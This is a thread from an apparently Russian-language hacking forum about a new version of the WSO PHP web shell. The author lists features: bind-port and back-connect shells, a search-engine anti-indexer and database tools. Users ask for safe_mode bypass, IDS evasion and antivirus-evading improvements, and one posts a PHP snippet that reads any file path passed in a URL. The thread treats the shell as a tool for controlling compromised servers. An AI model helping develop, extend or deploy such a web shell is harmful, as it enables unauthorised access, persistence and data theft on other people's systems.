WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Новая версия
    • убраны биндпорт и бек-коннект на C (лишний груз, перл в этом плане рулит)
    • при использовании биндпорта и бек-коннекта шелл больше не "зависает" (перловые скрипты отвязываются от терминала)
    • убрал html вставки
    • модифицировал антииндексатор. Теперь там не только гугл
    • Сделал, чтобы по дефолту кодировака была windows-1251
    • добавил возможность установить в конфиге (в начале скрипта) дефолтную кодировку
    • фиксы багов)

    Обновил первый пост. Спасибо за тесты и новые идеи.

    ps: jokester'у привет ;)
     
    13 people like this.
  2. Exрloit

    Exрloit Banned

    Joined:
    12 Oct 2009
    Messages:
    8
    Likes Received:
    3
    Reputations:
    -20
    ты не прав. Если ты кроме пыха нихуя не знаешь, то это всё равно не позволяет тебе так говорить.

    тем более, что не всегда на борту есть перл

    ЗЫ из-за какогото шелла, взяли в МОА. ппц
     
    #62 Exрloit, 19 Oct 2009
    Last edited: 19 Oct 2009
    2 people like this.
  3. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    Все бы хорошо, но не удобно пользоваться шеллом, именно команды писать!
     
  4. phpdreamer

    phpdreamer Member

    Joined:
    26 Jul 2009
    Messages:
    522
    Likes Received:
    86
    Reputations:
    19
    к плюсам шелла еще можно добавить то, что он не детектируется антивирусами, как старые шеллы )
     
    1 person likes this.
  5. almazz

    almazz New Member

    Joined:
    29 Mar 2009
    Messages:
    22
    Likes Received:
    4
    Reputations:
    -1
    не лучше ли " R T E D"отодвинуть к выделению файлов?
     
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    http://i031.radikal.ru/0910/7e/8afb93661ab7.jpg
    косит в фф немного(
     
    2 people like this.
  7. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Этот вопрос обсуждался в РОА и решение было вынесено коллективно.
    Оказывается мы все не правы, чтож, будем знать.
     
    2 people like this.
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Прекрасненько, да если надо биндпорт или бек-коннект, то я думаю труда несоставит залить скрипт так же как и шелл.
     
  9. Daned

    Daned Member

    Joined:
    9 Mar 2007
    Messages:
    24
    Likes Received:
    13
    Reputations:
    2
    Шелл понравился :) Несколько замечаний.
    При работе с БД не помешает сделать разделение колонок, читать неудобно, как заголовки, так и их значения.
    При неудачном коннекте к бд выводить ошибку (тайм аут, неверные данные...)
    В дампах постгрес в начале не пишется CREAT TABLE(), приходится дописывать самостоятельно :)
    Так же насчёт дампов, неплохо сделать опцию для его сохранения, а не сразу - скачивание.
    Думаю не будет в ущерб добавить ещё немного вариантов обхода сейф мода. И чтоб опция появлялась на глаза, лишь по необходимости, т.е. при сейфмоде, либо опенбейсдир.
    Помнится обещался обход ids, стоит ждать или нет? Давно приделал такую феньку к c99 :)
     
    1 person likes this.
  10. Artyr_006

    Artyr_006 Banned

    Joined:
    22 Oct 2009
    Messages:
    0
    Likes Received:
    16
    Reputations:
    1
    добный шелл +1
    SQL менеджер (MySql, PostgreSql) сюда бы еще и MSSQL добавить и ваще супер было бы)
     
  11. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Шелл лучший. Есть всё что надо!

    Правда есть
    Замечания:

    1) Когда в разделе SQL выбираешь таблицу, например `users` из базы base1,
    а потом выбираешь другую базу (base2), то в поле запроса остаётся старый запрос - "SELECT * FROM `users` LIMIT 0,30". И он выполняется для новой базы и если в ней нет такой таблицы - выдаётся ошибка "Error: Table 'base2.users' doesn't exist".

    Может показаться, что это мелкий недочёт.
    А вдруг в поле запроса будет написано
    или
    и в base2 таки окажется таблица users :), удаление которой не известно чем чревато.
    Конечно редко когда пишут такие вещи в этом поле, но всё же!

    2) Не плохо было бы добавить возможность просмотра картинок - если у файла расширение preg_match("/.jpg|.gif|.png|.bmp$/i"), то - в колонку "Actions" добавлять буковку v (view). И при нажатии на неё показывать картинку.
    В своём скрипте я реализовал это так:
    до всякого вывода на страницу поместил код:
    PHP:
    if(isset($_GET['f'])) 
    {
        
    $f $_GET['f'];
        if (
    stristr($f".jpg") || stristr($f".png") || stristr($f".jpeg") || stristr($f".gif") || stristr($f".bmp")) 
        {
            
    header('Content-Type: image/gif');
            
    ob_clean();
            
    flush();
            
    readfile($f);
            die();
        }
    }
    - и джпг и пнг показывает!

    Просто текстовый файл можно если что прочитать, а картинку - куй, приходится её копировать в веб-директорию и набирать адрес в браузере... ну или скачивать :). А тут - раз и готово :)

    3) На серверах с ОС Windows неизвестно в какую папку можно писать, а в какую нет. То есть в некоторых директориях для всех папок права drwxrwxrwx и Owner/Group: 0/0, но в какую-то из них писать можно, а в какую-то нет. и узнать в какую именно можно только экспериментальным путём :( Но это уже из-за особенностей разделения прав пользователей в системах Windows . У папки просто другой владелец - по аналогии с папками в
    Code:
    C:\Documents and Settings\%username%
    (пользователи не могут читать чужие документы).
    Вот как средствами php различать папки, доступные на запись от недоступных - ХЗ! Если кто знает, напишите плиз в личку! Ну или здесь.

    А в целом - шелл суперский, 100% лучше чем с99.
    До того, как его нашёл пользовался своим недописанным, в итоге так и не дописал :)
     
    #71 _gr34t, 27 Oct 2009
    Last edited: 8 Nov 2009
    1 person likes this.
  12. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    И ещё было бы хорошо:
    1. добавить возможность вводить порт для подключения к БД
    2. при просмотре таблицы например где 7 миллионов записей, очень неудобно постраничное переключение)))
    3. ajax по умолчанию включить
     
  13. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    (Dm),
    Шелл понимает конструкцию hostname:port.
    Есть 1 идея - заюзать <select>. Хз пока что из этого выдет. Или вариант budden'a.
    ок


    Выводы ошибок при соединении будут. Вернее они уже есть, но следующий релиз не раньше начала следующего года. Много надо сделать, а времени сейчас, к сожалению, совсем нет.
     
    #73 oRb, 5 Dec 2009
    Last edited: 6 Dec 2009
    1 person likes this.
  14. (Dm)

    (Dm) Elder - Старейшина

    Joined:
    8 Apr 2008
    Messages:
    261
    Likes Received:
    440
    Reputations:
    275
    Сделай как phpmyadmin
     
    1 person likes this.
  15. [х26]VОLАND

    [х26]VОLАND Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    Наилучший вариант - сделать как сказал budden + добавить input для ручного ввода номера страницы и input для номера записи, с которой начать просмотр (например в таблице 7 млн записей, а нам нужно посмотреть запись с id = 2.000.000. Чтобы не высчитывать номер страницы просто вводим в input id нужной записи и вывод происходит начиная с неё).
     
  16. pampom

    pampom Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    33
    Likes Received:
    5
    Reputations:
    0
    ммм а куда команды в console вбивать.
     
  17. Chack.

    Chack. Member

    Joined:
    1 Oct 2009
    Messages:
    0
    Likes Received:
    27
    Reputations:
    0
    Аналогичный вопрос...
     
  18. TDKronuS

    TDKronuS Member

    Joined:
    9 Nov 2009
    Messages:
    64
    Likes Received:
    13
    Reputations:
    3
    Под консолью есть поле для ввода.
    Просто там оформление сделано, как будто это настоящая консоль.
     
  19. Chack.

    Chack. Member

    Joined:
    1 Oct 2009
    Messages:
    0
    Likes Received:
    27
    Reputations:
    0
    Не чего туда ввести нельзя...
     
  20. x[0]x

    x[0]x Banned

    Joined:
    2 Dec 2008
    Messages:
    31
    Likes Received:
    5
    Reputations:
    -4
    а вот и неправда.